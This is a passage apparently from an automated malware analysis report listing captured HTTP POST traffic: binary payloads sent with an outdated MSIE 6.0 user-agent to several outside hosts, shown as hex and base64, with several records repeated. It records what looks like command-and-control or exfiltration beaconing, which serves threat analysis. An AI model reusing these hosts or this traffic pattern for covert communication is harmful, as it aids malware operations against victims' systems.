39 4f 4e 47 2f 5a 35 4c 50 4d 56 74 48 71 74 47 55 72 59 42 6f 4a 58 6d 67 67 75 66 5a 36 73 6b 31 4c 4c 35 64 57 75 51 57 48 56 75 37 67 44 63 46 75 64 74 35 53 59 58 4c 7a 2b 69 5a 30 36 41 5a 41 67 6f 38 33 4d 75 67 6a 4e 75 74 6e 7a Data Ascii: MEnqUHxdTo14GMXKJxrFww9yxFAUUGyMcI5T9rXFKzcYd1zc3UW2QM4GiKCmLOcfAz9S9rZ3Y/eZ2TzyWmORoFQY/rx6nF13ldAbudvEedR/5YrCjI9vBPynt9js8AnfKD5j+QyMc8uhMUmT5JJHfMg3P14vO6EU+JAzknHHvjeqBEK41JWsERT7XlARwjHYFGaZMkZAlXMgnUZ3rUTvSyiXLUp4PraSRX1OjeuwCxyudhpsgY2iZ3AvtBvm+Gx6XXNvZ3WHUQUqrpd2P3SlApCj17xXwvPNxlXpxinwHwkim6OxBFuRNKhYyqLSMN7YEXWbicJPPX/vmc1N600E4RfXJpmkHIgqzVjFVJuzhcCTjpeIxHJALKlkwcGtIVfDv3Jd2RL+JUHQNm5CxfgVX7LO3iqgC+XR+JV2IzPrjHZGm4kGxniOsohy4GeuTtVzgrWSCPeyzX1lnv/U9zRAv9ONG/Z5LPMVtHqtGUrYBoJXmggufZ6sk1LL5dWuQWHVu7gDcFudt5SYXLz+iZ06AZAgo83MugjNutnz
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 33 43 62 53 74 2f 54 31 63 6f 33 62 45 67 53 56 54 36 67 59 50 6b 63 31 2b 4c 48 73 7a 65 57 52 61 47 70 5a 57 54 37 30 30 37 69 41 37 4a 2f 72 46 6b 59 73 32 61 31 71 64 43 6b 4a 52 4f 31 49 6b 38 54 6f 5a 45 54 4a 66 49 48 61 73 4f 79 7a 52 61 75 62 35 39 33 4c 43 75 31 6a 67 52 61 6f 39 2f 47 34 77 72 33 58 77 59 71 4e 36 4a 65 31 71 37 5a 4b 30 57 2f 45 44 51 45 61 30 78 75 4a 43 6b 45 78 76 36 76 56 74 59 46 67 56 31 6f 45 62 49 42 54 4d 62 6f 6d 31 32 47 68 42 44 6a 6d 4d 74 57 75 69 76 4a 4f 51 55 69 64 31 41 4c 56 4c 66 72 76 71 78 4a 5a 42 53 78 64 38 4e 58 6a 31 2b 79 4c 4c 68 57 7a 58 35 30 4b 30 57 6d 76 79 30 62 35 47 67 31 66 57 63 78 75 4b 54 33 61 55 6c 71 6d 59 47 48 31 77 45 54 7a 66 4f 38 37 75 47 74 2b 41 4d 44 47 66 66 30 7a 2b 33 56 55 5a 42 52 4a 74 4b 67 47 6d 57 45 50 66 6e 78 78 44 4f 6c 42 4d 79 42 30 2b 68 6c 37 44 73 62 61 44 2b 74 50 6e 4a 31 52 46 6f 78 43 76 67 76 30 51 4a 53 69 5a 49 57 64 68 6c 75 47 33 64 30 44 71 43 62 5a 74 62 6c 31 72 49 31 65 66 6d 63 72 57 6f 44 64 51 77 53 77 62 4a 44 74 6b 2f 71 78 44 66 6f 37 33 46 77 69 77 31 70 58 6c 78 6e 45 54 52 36 59 4a 62 41 54 5a 43 74 50 6e 36 70 71 6e 5a 79 64 57 59 71 4e 70 43 62 52 6c 77 75 51 46 6d 43 41 4f 69 6b 31 6a 43 67 6e 30 54 79 47 54 7a 71 41 78 77 67 78 4e 59 35 4d 37 65 56 71 4b 61 48 41 6a 37 52 53 35 6e 64 45 48 45 4b 64 2f 30 76 34 4d 74 75 79 30 4e 39 71 38 34 67 38 54 53 54 6b 37 72 56 42 38 33 34 46 50 6b 67 77 4d 7a 61 54 39 6c 34 33 68 52 47 70 73 38 50 6c 78 57 69 38 4d 48 45 35 43 78 59 66 41 53 59 57 48 37 58 59 7a 34 55 4c 48 62 62 4c 2f 37 66 68 49 46 43 78 6d 4a 2f 4d 33 38 32 45 46 67 46 59 6b 64 4d 63 46 2b 62 63 36 69 39 6f 45 30 35 4c 34 31 4a 2b 51 63 6e 32 66 4d 43 6e 68 5a 2b 63 68 57 4d 66 31 70 2b 75 48 67 3d 3d Data Ascii: 3CbSt/T1co3bEgSVT6gYPkc1+LHszeWRaGpZWT7007iA7J/rFkYs2a1qdCkJRO1Ik8ToZETJfIHasOyzRaub593LCu1jgRao9/G4wr3XwYqN6Je1q7ZK0W/EDQEa0xuJCkExv6vVtYFgV1oEbIBTMbom12GhBDjmMtWuivJOQUid1ALVLfrvqxJZBSxd8NXj1+yLLhWzX50K0Wmvy0b5Gg1fWcxuKT3aUlqmYGH1wETzfO87uGt+AMDGff0z+3VUZBRJtKgGmWEPfnxxDOlBMyB0+hl7DsbaD+tPnJ1RFoxCvgv0QJSiZIWdhluG3d0DqCbZtbl1rI1efmcrWoDdQwSwbJDtk/qxDfo73Fwiw1pXlxnETR6YJbATZCtPn6pqnZydWYqNpCbRlwuQFmCAOik1jCgn0TyGTzqAxwgxNY5M7eVqKaHAj7RS5ndEHEKd/0v4Mtuy0N9q84g8TSTk7rVB834FPkgwMzaT9l43hRGps8PlxWi8MHE5CxYfASYWH7XYz4ULHbbL/7fhIFCxmJ/M382EFgFYkdMcF+bc6i9oE05L41J+Qcn2fMCnhZ+chWMf1p+uHg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 74 4b 71 47 70 2f 67 4f 67 34 30 59 50 75 76 66 65 34 56 46 47 75 73 6f 64 6c 70 41 4e 57 49 61 72 44 48 75 33 77 33 51 6b 79 32 46 33 36 42 79 74 44 2b 49 65 43 4c 6e 59 70 4e 53 58 30 6a 44 51 4c 7a 49 61 63 42 47 53 73 47 79 45 35 77 6a 53 6c 44 69 2b 34 6c 42 53 42 6d 76 54 73 57 51 6b 35 69 6b 64 4a 59 68 69 49 30 53 47 2f 2f 44 49 41 70 33 2b 35 59 5a 55 58 55 73 73 78 7a 2b 58 49 57 39 4a 52 30 46 77 51 38 61 64 44 7a 48 79 4f 4e 5a 4e 77 72 54 79 6b 46 2f 41 38 4f 36 2b 37 2f 46 65 59 46 4c 47 4a 56 4b 51 65 72 4f 4a 43 5a 4a 2f 2b 4b 66 59 57 52 6a 48 4b 70 6b 32 34 35 36 4f 38 47 65 4a 75 71 34 70 39 5a 50 69 71 76 53 61 4d 7a 6b 4b 53 56 72 69 57 7a 54 6e 34 4b 44 61 45 48 43 38 5a 46 4d 48 4c 30 52 57 4c 76 46 42 41 6c 55 37 73 41 51 71 49 64 58 71 70 59 51 41 57 55 49 38 48 65 59 33 65 39 42 52 79 43 61 51 6c 4a 63 4d 5a 36 77 50 2f 4b 59 37 34 56 38 4f 63 2f 64 7a 59 68 76 76 62 71 30 64 63 31 6d 58 49 74 46 76 6f 68 4e 49 61 77 41 50 50 6a 45 64 48 33 38 6a 7a 50 46 35 67 6a 77 45 68 58 75 44 44 36 33 31 6a 77 54 49 57 4a 74 34 49 4d 2f 53 76 36 56 42 48 6d 52 55 55 55 78 6d 71 61 48 39 62 47 39 4f 45 67 31 4e 54 38 6d 6c 65 67 4f 79 6f 73 4e 56 39 75 59 31 42 61 56 57 69 59 4d 41 2f 65 72 4a 45 51 34 37 71 77 48 6c 52 6b 54 65 4c 78 61 65 48 35 4f 32 77 53 42 51 41 43 49 75 75 49 78 45 6a 64 7a 72 50 39 2b 4e 77 2b 6f 56 39 61 6e 45 38 38 52 65 4f 63 64 46 34 6a 51 49 41 70 37 79 2f 6f 55 34 74 57 7a 65 2f 47 63 4f 4e 52 70 2f 4c 34 34 5a 35 67 35 57 6b 4e 77 72 6c 37 76 48 69 54 36 32 73 67 77 64 45 7a 7a 37 79 73 41 38 41 36 70 70 4e 7a 4f 43 38 59 45 66 53 42 48 68 37 37 55 68 76 55 67 43 5a 55 72 51 32 30 44 6d 6e 31 41 4a 5a 45 30 69 37 30 45 6a 4b 33 30 51 41 5a 72 Data Ascii: tKqGp/gOg40YPuvfe4VFGusodlpANWIarDHu3w3Qky2F36BytD+IeCLnYpNSX0jDQLzIacBGSsGyE5wjSlDi+4lBSBmvTsWQk5ikdJYhiI0SG//DIAp3+5YZUXUssxz+XIW9JR0FwQ8adDzHyONZNwrTykF/A8O6+7/FeYFLGJVKQerOJCZJ/+KfYWRjHKpk2456O8GeJuq4p9ZPiqvSaMzkKSVriWzTn4KDaEHC8ZFMHL0RWLvFBAlU7sAQqIdXqpYQAWUI8HeY3e9BRyCaQlJcMZ6wP/KY74V8Oc/dzYhvvbq0dc1mXItFvohNIawAPPjEdH38jzPF5gjwEhXuDD631jwTIWJt4IM/Sv6VBHmRUUUxmqaH9bG9OEg1NT8mlegOyosNV9uY1BaVWiYMA/erJEQ47qwHlRkTeLxaeH5O2wSBQACIuuIxEjdzrP9+Nw+oV9anE88ReOcdF4jQIAp7y/oU4tWze/GcONRp/L44Z5g5WkNwrl7vHiT62sgwdEzz7ysA8A6ppNzOC8YEfSBHh77UhvUgCZUrQ20Dmn1AJZE0i70EjK30QAZr
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 6f 54 51 31 30 77 56 6e 47 49 30 73 4b 36 6e 50 4c 43 77 31 4c 33 37 31 69 53 33 54 64 6e 53 77 43 5a 51 65 65 62 31 4b 59 33 58 44 70 32 2f 45 4d 53 2f 53 32 74 39 35 31 48 35 79 58 33 7a 6a 32 57 79 64 4e 52 73 4b 63 54 77 61 63 75 50 51 55 79 59 45 6b 71 53 4b 69 36 2f 6b 30 74 72 5a 2f 4e 72 47 7a 4c 37 70 39 30 6f 70 7a 42 7a 54 34 7a 6d 72 56 52 51 65 70 4f 2b 52 62 75 6f 59 62 59 47 4c 4e 4c 74 45 30 71 35 71 2b 73 4d 61 64 30 31 49 6b 63 47 6b 2b 64 35 47 44 66 76 4b 63 69 54 74 48 33 46 77 75 43 66 62 67 68 59 47 49 30 41 36 4d 74 33 51 47 61 33 43 6e 66 38 71 43 6c 54 4b 75 67 58 6c 2f 6c 4e 4f 66 32 67 52 54 68 4b 68 36 36 41 76 42 39 31 73 55 4a 52 42 4a 49 4f 6f 62 39 53 70 59 5a 39 35 73 44 68 4f 53 2f 31 51 74 6c 6a 69 71 62 4a 31 47 38 41 43 6d 32 41 51 37 4c 4a 69 52 51 65 6e 55 72 71 34 46 52 32 48 70 6a 64 35 38 67 50 33 54 70 52 4f 4c 39 6a 38 70 35 6b 49 75 73 58 7a 57 4a 56 59 4d 75 6f 33 54 79 4f 66 6a 34 74 62 6e 4c 43 72 4e 42 6f 71 44 61 30 35 31 45 74 41 58 5a 6c 2f 38 52 61 47 2f 63 6c 46 66 4f 45 6c 31 58 48 6b 2f 6c 38 41 41 31 4b 69 46 72 56 63 66 38 67 43 74 71 7a 66 6b 6d 6e 5a 6f 56 54 74 6c 47 53 45 73 30 46 52 33 75 6f 61 2b 64 4f 70 55 69 48 43 38 59 6b 6e 65 6c 66 76 6a 52 78 43 50 79 46 64 47 57 30 35 49 73 74 52 76 6b 35 64 4f 36 59 50 78 32 46 4f 48 6f 55 53 32 67 48 65 76 30 43 49 44 73 62 47 6d 75 6e 34 33 79 61 51 7a 37 53 79 33 77 4a 36 35 43 47 44 6b 63 64 63 55 74 72 6a 66 6f 5a 50 54 55 63 52 47 61 4a 49 6f 67 79 66 45 6a 66 38 63 36 64 32 58 49 30 38 44 34 68 34 4b 46 76 6b 6e 6a 4e 30 62 75 63 36 61 32 32 46 4f 35 67 3d Data Ascii: oTQ10wVnGI0sK6nPLCw1L371iS3TdnSwCZQeeb1KY3XDp2/EMS/S2t951H5yX3zj2WydNRsKcTwacuPQUyYEkqSKi6/k0trZ/NrGzL7p90opzBzT4zmrVRQepO+RbuoYbYGLNLtE0q5q+sMad01IkcGk+d5GDfvKciTtH3FwuCfbghYGI0A6Mt3QGa3Cnf8qClTKugXl/lNOf2gRThKh66AvB91sUJRBJIOob9SpYZ95sDhOS/1QtljiqbJ1G8ACm2AQ7LJiRQenUrq4FR2Hpjd58gP3TpROL9j8p5kIusXzWJVYMuo3TyOfj4tbnLCrNBoqDa051EtAXZl/8RaG/clFfOEl1XHk/l8AA1KiFrVcf8gCtqzfkmnZoVTtlGSEs0FR3uoa+dOpUiHC8YknelfvjRxCPyFdGW05IstRvk5dO6YPx2FOHoUS2gHev0CIDsbGmun43yaQz7Sy3wJ65CGDkcdcUtrjfoZPTUcRGaJIogyfEjf8c6d2XI08D4h4KFvknjN0buc6a22FO5g=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 74 4b 71 47 70 2f 67 4f 67 34 30 59 50 75 76 66 65 34 56 46 47 75 73 6f 64 6c 70 41 4e 57 49 61 72 44 48 75 33 77 33 51 6b 79 32 46 33 36 42 79 74 44 2b 49 65 43 4c 6e 59 70 4e 53 58 30 6a 44 51 4c 7a 49 61 63 42 47 53 73 47 79 45 35 77 6a 53 6c 44 69 2b 34 6c 42 53 42 6d 76 54 73 57 51 6b 35 69 6b 64 4a 59 68 69 49 30 53 47 2f 2f 44 49 41 70 33 2b 35 59 5a 55 58 55 73 73 78 7a 2b 58 49 57 39 4a 52 30 46 77 51 38 61 64 44 7a 48 79 4f 4e 5a 4e 77 72 54 79 6b 46 2f 41 38 4f 36 2b 37 2f 46 65 59 46 4c 47 4a 56 4b 51 65 72 4f 4a 43 5a 4a 2f 2b 4b 66 59 57 52 6a 48 4b 70 6b 32 34 35 36 4f 38 47 65 4a 75 71 34 70 39 5a 50 69 71 76 53 61 4d 7a 6b 4b 53 56 72 69 57 7a 54 6e 34 4b 44 61 45 48 43 38 5a 46 4d 48 4c 30 52 57 4c 76 46 42 41 6c 55 37 73 41 51 71 49 64 58 71 70 59 51 41 57 55 49 38 48 65 59 33 65 39 42 52 79 43 61 51 6c 4a 63 4d 5a 36 77 50 2f 4b 59 37 34 56 38 4f 63 2f 64 7a 59 68 76 76 62 71 30 64 63 31 6d 58 49 74 46 76 6f 68 4e 49 61 77 41 50 50 6a 45 64 48 33 38 6a 7a 50 46 35 67 6a 77 45 68 58 75 44 44 36 33 31 6a 77 54 49 57 4a 74 34 49 4d 2f 53 76 36 56 42 48 6d 52 55 55 55 78 6d 71 61 48 39 62 47 39 4f 45 67 31 4e 54 38 6d 6c 65 67 4f 79 6f 73 4e 56 39 75 59 31 42 61 56 57 69 59 4d 41 2f 65 72 4a 45 51 34 37 71 77 48 6c 52 6b 54 65 4c 78 61 65 48 35 4f 32 77 53 42 51 41 43 49 75 75 49 78 45 6a 64 7a 72 50 39 2b 4e 77 2b 6f 56 39 61 6e 45 38 38 52 65 4f 63 64 46 34 6a 51 49 41 70 37 79 2f 6f 55 34 74 57 7a 65 2f 47 63 4f 4e 52 70 2f 4c 34 34 5a 35 67 35 57 6b 4e 77 72 6c 37 76 48 69 54 36 32 73 67 77 64 45 7a 7a 37 79 73 41 38 41 36 70 70 4e 7a 4f 43 38 59 45 66 53 42 48 68 37 37 55 68 76 55 67 43 5a 55 72 51 32 30 44 6d 6e 31 41 4a 5a 45 30 69 37 30 45 6a 4b 33 30 51 41 5a 72 Data Ascii: tKqGp/gOg40YPuvfe4VFGusodlpANWIarDHu3w3Qky2F36BytD+IeCLnYpNSX0jDQLzIacBGSsGyE5wjSlDi+4lBSBmvTsWQk5ikdJYhiI0SG//DIAp3+5YZUXUssxz+XIW9JR0FwQ8adDzHyONZNwrTykF/A8O6+7/FeYFLGJVKQerOJCZJ/+KfYWRjHKpk2456O8GeJuq4p9ZPiqvSaMzkKSVriWzTn4KDaEHC8ZFMHL0RWLvFBAlU7sAQqIdXqpYQAWUI8HeY3e9BRyCaQlJcMZ6wP/KY74V8Oc/dzYhvvbq0dc1mXItFvohNIawAPPjEdH38jzPF5gjwEhXuDD631jwTIWJt4IM/Sv6VBHmRUUUxmqaH9bG9OEg1NT8mlegOyosNV9uY1BaVWiYMA/erJEQ47qwHlRkTeLxaeH5O2wSBQACIuuIxEjdzrP9+Nw+oV9anE88ReOcdF4jQIAp7y/oU4tWze/GcONRp/L44Z5g5WkNwrl7vHiT62sgwdEzz7ysA8A6ppNzOC8YEfSBHh77UhvUgCZUrQ20Dmn1AJZE0i70EjK30QAZr
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 6f 54 51 31 30 77 56 6e 47 49 30 73 4b 36 6e 50 4c 43 77 31 4c 33 37 31 69 53 33 54 64 6e 53 77 43 5a 51 65 65 62 31 4b 59 33 58 44 70 32 2f 45 4d 53 2f 53 32 74 39 35 31 48 35 79 58 33 7a 6a 32 57 79 64 4e 52 73 4b 63 54 77 61 63 75 50 51 55 79 59 45 6b 71 53 4b 69 36 2f 6b 30 74 72 5a 2f 4e 72 47 7a 4c 37 70 39 30 6f 70 7a 42 7a 54 34 7a 6d 72 56 52 51 65 70 4f 2b 52 62 75 6f 59 62 59 47 4c 4e 4c 74 45 30 71 35 71 2b 73 4d 61 64 30 31 49 6b 63 47 6b 2b 64 35 47 44 66 76 4b 63 69 54 74 48 33 46 77 75 43 66 62 67 68 59 47 49 30 41 36 4d 74 33 51 47 61 33 43 6e 66 38 71 43 6c 54 4b 75 67 58 6c 2f 6c 4e 4f 66 32 67 52 54 68 4b 68 36 36 41 76 42 39 31 73 55 4a 52 42 4a 49 4f 6f 62 39 53 70 59 5a 39 35 73 44 68 4f 53 2f 31 51 74 6c 6a 69 71 62 4a 31 47 38 41 43 6d 32 41 51 37 4c 4a 69 52 51 65 6e 55 72 71 34 46 52 32 48 70 6a 64 35 38 67 50 33 54 70 52 4f 4c 39 6a 38 70 35 6b 49 75 73 58 7a 57 4a 56 59 4d 75 6f 33 54 79 4f 66 6a 34 74 62 6e 4c 43 72 4e 42 6f 71 44 61 30 35 31 45 74 41 58 5a 6c 2f 38 52 61 47 2f 63 6c 46 66 4f 45 6c 31 58 48 6b 2f 6c 38 41 41 31 4b 69 46 72 56 63 66 38 67 43 74 71 7a 66 6b 6d 6e 5a 6f 56 54 74 6c 47 53 45 73 30 46 52 33 75 6f 61 2b 64 4f 70 55 69 48 43 38 59 6b 6e 65 6c 66 76 6a 52 78 43 50 79 46 64 47 57 30 35 49 73 74 52 76 6b 35 64 4f 36 59 50 78 32 46 4f 48 6f 55 53 32 67 48 65 76 30 43 49 44 73 62 47 6d 75 6e 34 33 79 61 51 7a 37 53 79 33 77 4a 36 35 43 47 44 6b 63 64 63 55 74 72 6a 66 6f 5a 50 54 55 63 52 47 61 4a 49 6f 67 79 66 45 6a 66 38 63 36 64 32 58 49 30 38 44 34 68 34 4b 46 76 6b 6e 6a 4e 30 62 75 63 36 61 32 32 46 4f 35 67 3d Data Ascii: oTQ10wVnGI0sK6nPLCw1L371iS3TdnSwCZQeeb1KY3XDp2/EMS/S2t951H5yX3zj2WydNRsKcTwacuPQUyYEkqSKi6/k0trZ/NrGzL7p90opzBzT4zmrVRQepO+RbuoYbYGLNLtE0q5q+sMad01IkcGk+d5GDfvKciTtH3FwuCfbghYGI0A6Mt3QGa3Cnf8qClTKugXl/lNOf2gRThKh66AvB91sUJRBJIOob9SpYZ95sDhOS/1QtljiqbJ1G8ACm2AQ7LJiRQenUrq4FR2Hpjd58gP3TpROL9j8p5kIusXzWJVYMuo3TyOfj4tbnLCrNBoqDa051EtAXZl/8RaG/clFfOEl1XHk/l8AA1KiFrVcf8gCtqzfkmnZoVTtlGSEs0FR3uoa+dOpUiHC8YknelfvjRxCPyFdGW05IstRvk5dO6YPx2FOHoUS2gHev0CIDsbGmun43yaQz7Sy3wJ65CGDkcdcUtrjfoZPTUcRGaJIogyfEjf8c6d2XI08D4h4KFvknjN0buc6a22FO5g=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 33 43 62 53 74 2f 54 31 63 6f 33 62 45 67 53 56 54 36 67 59 50 6b 63 31 2b 4c 48 73 7a 65 57 52 61 47 70 5a 57 54 37 30 30 37 69 41 37 4a 2f 72 46 6b 59 73 32 61 31 71 64 43 6b 4a 52 4f 31 49 6b 38 54 6f 5a 45 54 4a 66 49 48 61 73 4f 79 7a 52 61 75 62 35 39 33 4c 43 75 31 6a 67 52 61 6f 39 2f 47 34 77 72 33 58 77 59 71 4e 36 4a 65 31 71 37 5a 4b 30 57 2f 45 44 51 45 61 30 78 75 4a 43 6b 45 78 76 36 76 56 74 59 46 67 56 31 6f 45 62 49 42 54 4d 62 6f 6d 31 32 47 68 42 44 6a 6d 4d 74 57 75 69 76 4a 4f 51 55 69 64 31 41 4c 56 4c 66 72 76 71 78 4a 5a 42 53 78 64 38 4e 58 6a 31 2b 79 4c 4c 68 57 7a 58 35 30 4b 30 57 6d 76 79 30 62 35 47 67 31 66 57 63 78 75 4b 54 33 61 55 6c 71 6d 59 47 48 31 77 45 54 7a 66 4f 38 37 75 47 74 2b 41 4d 44 47 66 66 30 7a 2b 33 56 55 5a 42 52 4a 74 4b 67 47 6d 57 45 50 66 6e 78 78 44 4f 6c 42 4d 79 42 30 2b 68 6c 37 44 73 62 61 44 2b 74 50 6e 4a 31 52 46 6f 78 43 76 67 76 30 51 4a 53 69 5a 49 57 64 68 6c 75 47 33 64 30 44 71 43 62 5a 74 62 6c 31 72 49 31 65 66 6d 63 72 57 6f 44 64 51 77 53 77 62 4a 44 74 6b 2f 71 78 44 66 6f 37 33 46 77 69 77 31 70 58 6c 78 6e 45 54 52 36 59 4a 62 41 54 5a 43 74 50 6e 36 70 71 6e 5a 79 64 57 59 71 4e 70 43 62 52 6c 77 75 51 46 6d 43 41 4f 69 6b 31 6a 43 67 6e 30 54 79 47 54 7a 71 41 78 77 67 78 4e 59 35 4d 37 65 56 71 4b 61 48 41 6a 37 52 53 35 6e 64 45 48 45 4b 64 2f 30 76 34 4d 74 75 79 30 4e 39 71 38 34 67 38 54 53 54 6b 37 72 56 42 38 33 34 46 50 6b 67 77 4d 7a 61 54 39 6c 34 33 68 52 47 70 73 38 50 6c 78 57 69 38 4d 48 45 35 43 78 59 66 41 53 59 57 48 37 58 59 7a 34 55 4c 48 62 62 4c 2f 37 66 68 49 46 43 78 6d 4a 2f 4d 33 38 32 45 46 67 46 59 6b 64 4d 63 46 2b 62 63 36 69 39 6f 45 30 35 4c 34 31 4a 2b 51 63 6e 32 66 4d 43 6e 68 5a 2b 63 68 57 4d 66 31 70 2b 75 48 67 3d 3d Data Ascii: 3CbSt/T1co3bEgSVT6gYPkc1+LHszeWRaGpZWT7007iA7J/rFkYs2a1qdCkJRO1Ik8ToZETJfIHasOyzRaub593LCu1jgRao9/G4wr3XwYqN6Je1q7ZK0W/EDQEa0xuJCkExv6vVtYFgV1oEbIBTMbom12GhBDjmMtWuivJOQUid1ALVLfrvqxJZBSxd8NXj1+yLLhWzX50K0Wmvy0b5Gg1fWcxuKT3aUlqmYGH1wETzfO87uGt+AMDGff0z+3VUZBRJtKgGmWEPfnxxDOlBMyB0+hl7DsbaD+tPnJ1RFoxCvgv0QJSiZIWdhluG3d0DqCbZtbl1rI1efmcrWoDdQwSwbJDtk/qxDfo73Fwiw1pXlxnETR6YJbATZCtPn6pqnZydWYqNpCbRlwuQFmCAOik1jCgn0TyGTzqAxwgxNY5M7eVqKaHAj7RS5ndEHEKd/0v4Mtuy0N9q84g8TSTk7rVB834FPkgwMzaT9l43hRGps8PlxWi8MHE5CxYfASYWH7XYz4ULHbbL/7fhIFCxmJ/M382EFgFYkdMcF+bc6i9oE05L41J+Qcn2fMCnhZ+chWMf1p+uHg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.waldi.plCache-Control: no-cacheData Raw: 49 51 50 43 48 52 67 32 6a 34 32 43 2b 4e 70 37 47 30 4b 61 78 41 74 39 69 79 2f 67 43 68 79 6a 7a 44 6f 2b 66 4c 75 57 75 37 35 37 35 55 33 38 59 55 64 76 57 4b 4c 65 4f 4b 67 4a 78 57 79 53 79 74 4e 35 4a 4f 4f 64 73 46 55 2f 31 36 77 71 53 4f 61 6b 58 6c 58 41 52 50 68 37 30 48 35 44 71 63 6f 72 6e 7a 76 79 4f 59 70 31 31 64 6e 2b 45 35 67 6b 7a 6d 74 66 62 4d 6d 51 4f 66 34 32 55 63 59 61 2b 47 5a 6f 63 62 30 57 77 77 69 78 65 4e 51 70 73 71 4f 6f 4c 65 75 71 6d 6f 4c 56 78 65 65 35 49 30 52 43 75 78 57 61 5a 6e 61 71 44 67 70 68 33 4c 56 55 32 58 47 43 75 33 67 36 33 74 2f 4e 78 70 4b 4b 35 72 4f 53 75 63 76 72 52 70 69 37 34 31 5a 46 51 6b 6f 4d 31 38 6e 6e 2f 65 45 46 4c 72 6e 62 36 35 50 5a 63 67 37 32 2b 59 35 4b 57 36 59 64 37 63 63 6b 48 78 35 48 6b 7a 39 30 74 62 4d 66 75 6d 74 61 2b 56 6e 53 33 31 46 64 6f 68 43 6e 37 51 4d 39 44 75 4d 53 78 46 4d 53 4e 51 31 41 57 4b 42 41 7a 71 35 46 61 7a 57 6c 64 66 59 39 33 30 37 6c 39 75 68 53 42 49 6e 38 4e 62 36 35 47 59 68 35 2b 2f 39 70 70 68 38 64 4a 78 32 52 41 76 7a 32 59 34 31 73 2f 33 30 77 75 71 5a 65 67 78 70 6e 75 71 76 39 2f 66 4c 78 35 58 45 53 38 35 45 4c 66 61 63 65 54 31 6b 37 73 72 2b 4b 5a 7a 4f 53 32 38 43 72 71 7a 33 4c 30 44 62 50 52 4c 65 73 75 6c 72 41 71 71 64 47 2b 4b 45 65 42 79 78 70 37 69 38 55 6c 69 75 5a 78 64 54 66 31 5a 6f 59 6e 77 68 4e 71 71 76 4a 34 37 59 74 4e 4c 4d 34 45 63 67 4c 6e 62 4d 4b 48 76 66 5a 6e 4f 39 39 4e 2f 75 51 79 37 6d 2f 72 73 62 2b 52 31 4f 31 37 57 31 41 47 4d 45 50 4e 59 32 33 6d 65 54 5a 30 77 46 5a 6d 53 30 55 63 47 56 64 47 6d 2f 4f 30 73 50 5a 68 2f 6f 3d Data Ascii: IQPCHRg2j42C+Np7G0KaxAt9iy/gChyjzDo+fLuWu7575U38YUdvWKLeOKgJxWySytN5JOOdsFU/16wqSOakXlXARPh70H5DqcornzvyOYp11dn+E5gkzmtfbMmQOf42UcYa+GZocb0WwwixeNQpsqOoLeuqmoLVxee5I0RCuxWaZnaqDgph3LVU2XGCu3g63t/NxpKK5rOSucvrRpi741ZFQkoM18nn/eEFLrnb65PZcg72+Y5KW6Yd7cckHx5Hkz90tbMfumta+VnS31FdohCn7QM9DuMSxFMSNQ1AWKBAzq5FazWldfY9307l9uhSBIn8Nb65GYh5+/9pph8dJx2RAvz2Y41s/30wuqZegxpnuqv9/fLx5XES85ELfaceT1k7sr+KZzOS28Crqz3L0DbPRLesulrAqqdG+KEeByxp7i8UliuZxdTf1ZoYnwhNqqvJ47YtNLM4EcgLnbMKHvfZnO99N/uQy7m/rsb+R1O17W1AGMEPNY23meTZ0wFZmS0UcGVdGm/O0sPZh/o=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.olras.comCache-Control: no-cacheData Raw: 66 54 2f 6e 78 4a 36 36 57 49 7a 4d 72 45 75 34 36 57 47 35 38 49 45 68 68 4e 58 65 71 4d 6b 78 73 6a 78 4e 2f 4f 75 78 67 45 75 38 39 58 42 30 5a 7a 55 33 5a 6f 53 58 64 39 71 32 59 51 77 46 68 52 6e 62 65 4e 62 73 6b 31 71 77 38 36 6f 36 45 32 6a 39 49 78 62 65 31 56 36 78 38 4b 65 62 76 34 35 48 72 58 4e 69 35 7a 6b 73 4b 70 58 36 6e 59 31 37 4f 56 55 45 30 32 66 72 45 77 64 39 68 38 61 61 2b 55 78 2f 6a 77 7a 42 36 72 4b 43 69 6c 69 66 4c 75 75 48 71 46 6a 45 77 39 69 4d 30 2f 53 70 6f 69 5a 75 79 79 4d 6f 71 65 44 31 6c 67 56 57 54 61 30 42 42 56 56 33 44 70 63 4f 58 42 55 52 67 41 53 77 51 69 42 49 45 77 38 70 79 50 2b 49 65 74 73 45 4f 4b 57 56 57 5a 30 54 45 62 4c 67 6c 36 4d 68 31 54 2f 56 76 6a 4f 69 76 72 2b 75 61 63 2b 70 66 6c 6e 75 2b 6d 2b 36 69 33 31 67 5a 50 4f 65 4d 4c 2f 63 4e 61 4f 37 64 67 77 42 6c 6f 30 44 6b 79 79 39 33 7a 62 